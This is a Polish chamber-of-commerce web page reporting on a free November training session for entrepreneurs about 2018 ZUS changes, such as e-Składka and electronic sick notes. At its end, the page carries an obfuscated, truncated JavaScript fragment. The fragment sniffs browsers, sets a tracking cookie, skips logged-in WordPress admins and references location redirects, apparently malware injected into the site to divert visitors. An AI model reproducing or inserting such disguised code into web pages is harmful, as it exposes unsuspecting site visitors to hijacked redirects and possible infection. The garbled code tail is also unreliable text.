Zmiany ZUS od 1 stycznia 2018 – relacja i materiały | Północna Izba Gospodarcza w Koszalinie

23 listopada br. w Restauracji Buongiorno w Koszalinie odbyło się bezpłatne szkolenie dla przedsiębiorców pt. „Zmiany w ZUS od 1 stycznia 2018 roku”.

Podczas spotkania przedsiębiorcy dowiedzieli się m.in. z zakresu nowej, indywidualnej e-Składki – jednego numeru konta za ubezpieczenie. W związku z tym zagadnieniem, zostały przedstawione wszystkie szansy i zagrożenia dla pracodawców. Drugim zagadnieniem były informacje dotyczące e-ZLA, czyli elektroniczne zwolnienia lekarskie. Od przyszłego roku zaświadczenia będą wystawiane przez lekarzy komputerowo i wysyłane bezpośrednio do ZUS-u. Ważnym punktem szkolenia było również zagadnienie dotyczące pełnomocnictw. Na wszystkie dodatkowe pytania odpowiadały pracownice Zakładu Ubezpieczeń Społecznych w Koszalinie.

Po szkoleniu w specjalnie przygotowanym miejscu, była możliwość założenia zaufanego profilu na PUE.

W załączeniu prezentacje:

Bardzo dziękujemy za przybycie wszystkim uczestnikom szkolenia i zapraszamy na kolejne już 28 listopada!

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m